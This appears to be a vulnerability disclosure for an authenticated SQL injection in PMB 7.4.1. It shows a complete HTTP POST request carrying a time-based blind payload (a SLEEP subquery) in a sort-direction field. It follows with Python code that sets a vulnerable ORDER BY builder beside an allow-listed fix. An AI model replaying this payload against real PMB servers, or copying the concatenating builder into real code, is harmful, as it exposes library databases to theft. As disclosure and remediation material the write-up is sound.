(clone of the original repository: https://github.com/jenaye/PMB)
- Description : Allows an authenticated attacker to dump the database via a POST request
- Affected version : 7.4.1
To build this PoC, I just installed the software using Docker (https://github.com/jperon/pmb/), and more than 10 injections like this one were found.
- Vulnerability Type : SQL Injection (Authenticated)
Here is an example:
POST /pmb/circ.php?categ=listeresa&sub=encours HTTP/1.1
Host: 172.30.0.19
Content-Length: 1861
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.0.19
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.0.19/pmb/circ.php?categ=listeresa&sub=encours
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PhpMyBibli-OPACDB=bibli; PhpMyBibli-LOGIN=admin; PhpMyBibli-SESSNAME=PhpMyBibli; PhpMyBibli-SESSID=3846178265; PhpMyBibli-DATABASE=bibli; searchFieldsTreeSaveStateCookie=root%2Croot%2Fparent_3%2Croot%2Fparent_4%2Croot%2Fparent_5%2Croot%2Fparent_6%2Croot%2Fparent_1%2Croot%2Fparent_2; pmb3846178265=dr61h5606viek57uuvoboerjvh
Connection: close
reservations_circ_ui_montrerquoi=valid_noconf&reservations_circ_ui_expl_codestat=&reservations_circ_ui_expl_section=25&reservations_circ_ui_applied_sort[0][by]=record&reservations_circ_ui_applied_sort[0][asc_desc]= AND (SELECT 6646 FROM (SELECT(SLEEP(40)))xBfG)&reservations_circ_ui_applied_sort[1][by]=resa_date&reservations_circ_ui_applied_sort[1][asc_desc]=asc&reservations_circ_ui_json_filters={"id_notice":0,"id_bulletin":0,"id_empr":0,"montrerquoi":"all","f_loc":0,"empr_location":"","removal_location":"0","available_location":"","resa_state":"encours","expl_codestat":"","expl_codestats":[],"expl_section":"","expl_sections":[],"expl_statut":"","expl_statuts":[],"expl_type":"","expl_types":[],"expl_cote":"","expl_location":"","expl_locations":[],"groups":[],"resa_condition":"","resa_loc_retrait":"","resa_loc":0,"ids":""}&reservations_circ_ui_json_selected_columns={"record":"233","expl_cote":"296","empr":"empr_nom_prenom","empr_location":"editions_datasource_empr_location","rank":"366","resa_date":"374","resa_condition":"resa_condition","resa_date_fin":"resa_date_fin_td","resa_validee":"resa_validee","resa_confirmee":"resa_confirmee"}&reservations_circ_ui_json_applied_group=[""]&reservations_circ_ui_json_applied_sort=[{"by":"record","asc_desc":"asc"},{"by":"resa_date","asc_desc":"asc"}]&reservations_circ_ui_page=1&reservations_circ_ui_nb_per_page=40&reservations_circ_ui_pager={"page":1,"nb_per_page":40,"nb_per_page_on_group":false,"nb_results":0,"nb_page":1,"all_on_page":false,"allow_force_all_on_page":true}&reservations_circ_ui_selected_filters={"montrerquoi":"empr_etat_resa_query","expl_codestat":"editions_datasource_expl_codestat","expl_section":"editions_datasource_expl_section"}&reservations_circ_ui_ancre=&reservations_circ_ui_go_directly_to_ancre=&reservations_circ_ui_initialization=&reservations_circ_ui_applied_action=apply
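In the request above the injection sits in reservations_circ_ui_applied_sort[0][asc_desc], i.e. the sort direction that the application concatenates into its ORDER BY clause. The following is an added example (not PMB's code; written in Python with sqlite3 standing in for PHP/MySQL, and with an assumed column set) that shows that flawed pattern beside an allow-listed builder, run against a constructed reservations table:

```python
import sqlite3

# Allow-lists (assumed; the real PMB column set differs): the request's "by"
# value is mapped to a real column, and the direction to a fixed keyword.
SORT_COLUMNS = {"record": "id_notice", "resa_date": "resa_date"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

# Constructed parameters in the shape of
# reservations_circ_ui_applied_sort[i][by] / [i][asc_desc].
BENIGN_SORT = [{"by": "record", "asc_desc": "asc"},
               {"by": "resa_date", "asc_desc": "desc"}]
# The page's payload: the direction field carries an injected subquery.
INJECTED_SORT = [{"by": "record",
                  "asc_desc": " AND (SELECT 6646 FROM (SELECT(SLEEP(40)))xBfG)"}]


def order_by_vulnerable(applied_sort):
    """Mirrors the flawed pattern: the direction is trusted and concatenated."""
    return "ORDER BY " + ", ".join(
        f"{SORT_COLUMNS[s['by']]} {s['asc_desc']}" for s in applied_sort)


def order_by_safe(applied_sort):
    """Hardened: both column and direction must come from the allow-lists;
    anything else is rejected before any query string is built."""
    parts = []
    for s in applied_sort:
        col = SORT_COLUMNS.get(s.get("by"))
        direction = SORT_DIRECTIONS.get(str(s.get("asc_desc", "")).lower())
        if col is None or direction is None:
            raise ValueError(f"rejected sort parameter: {s!r}")
        parts.append(f"{col} {direction}")
    return "ORDER BY " + ", ".join(parts)


def list_reservations(applied_sort, builder=order_by_safe):
    """Runs the listing query over a constructed in-memory table and returns
    the reservation ids in the resulting order."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE resa (id_resa INTEGER, id_notice INTEGER, resa_date TEXT)")
    db.executemany("INSERT INTO resa VALUES (?, ?, ?)",
                   [(1, 20, "2022-07-01"), (2, 10, "2022-07-03"), (3, 10, "2022-07-02")])
    sql = "SELECT id_resa FROM resa " + builder(applied_sort)
    return [row[0] for row in db.execute(sql)]
```

With the vulnerable builder the payload lands verbatim in the SQL text; with the allow-listed builder the same request is rejected before it reaches the database.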